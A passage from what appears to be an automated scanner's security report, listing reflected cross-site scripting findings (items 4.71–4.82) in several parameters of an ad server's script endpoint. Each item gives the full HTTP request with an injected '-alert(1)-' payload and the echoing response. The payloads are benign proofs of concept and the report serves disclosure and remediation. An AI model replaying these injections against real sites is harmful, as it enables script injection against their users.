9/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt86b5a0"-alert(1)-"672f1f4bd&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

4.71. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 983a0'-alert(1)-'9af9ccbb6b9 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8983a0'-alert(1)-'9af9ccbb6b9&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8983a0'-alert(1)-'9af9ccbb6b9&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.72. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5467f'-alert(1)-'9ed5241a6ce was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=5467f'-alert(1)-'9ed5241a6ce HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=5467f'-alert(1)-'9ed5241a6cehttp://www.xc4.is\">
...[SNIP]...

4.73. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a03"-alert(1)-"022abc0060 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=c2a03"-alert(1)-"022abc0060 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6421

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=c2a03"-alert(1)-"022abc0060http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH
...[SNIP]...

4.74. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c453b'-alert(1)-'81b54708230 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&c453b'-alert(1)-'81b54708230=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6440

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&c453b'-alert(1)-'81b54708230=1http://www.xc4.is\">
...[SNIP]...

4.75. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ab1"-alert(1)-"63e4c9f6674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&59ab1"-alert(1)-"63e4c9f6674=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6440

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&59ab1"-alert(1)-"63e4c9f6674=1http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var win
...[SNIP]...

4.76. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8210f'-alert(1)-'afe3257d6a1 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory8210f'-alert(1)-'afe3257d6a1&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory8210f'-alert(1)-'afe3257d6a1&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.77. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81584"-alert(1)-"f1713590b03 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory81584"-alert(1)-"f1713590b03&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory81584"-alert(1)-"f1713590b03&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

4.78. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 919b0"-alert(1)-"47f06942a38 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle919b0"-alert(1)-"47f06942a38&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/280%3B39025848/39043606/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle919b0"-alert(1)-"47f06942a38&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.79. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d759f'-alert(1)-'26bb58939a1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddled759f'-alert(1)-'26bb58939a1&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/280%3B39025845/39043602/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddled759f'-alert(1)-'26bb58939a1&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.80. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e2d2'-alert(1)-'8bc2132a1be was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b1e2d2'-alert(1)-'8bc2132a1be&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b1e2d2'-alert(1)-'8bc2132a1be&goto=http://www.xc4.is\">
...[SNIP]...

4.81. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c3cf"-alert(1)-"2797ce68773 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b9c3cf"-alert(1)-"2797ce68773&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b9c3cf"-alert(1)-"2797ce68773&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var
...[SNIP]...

4.82. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
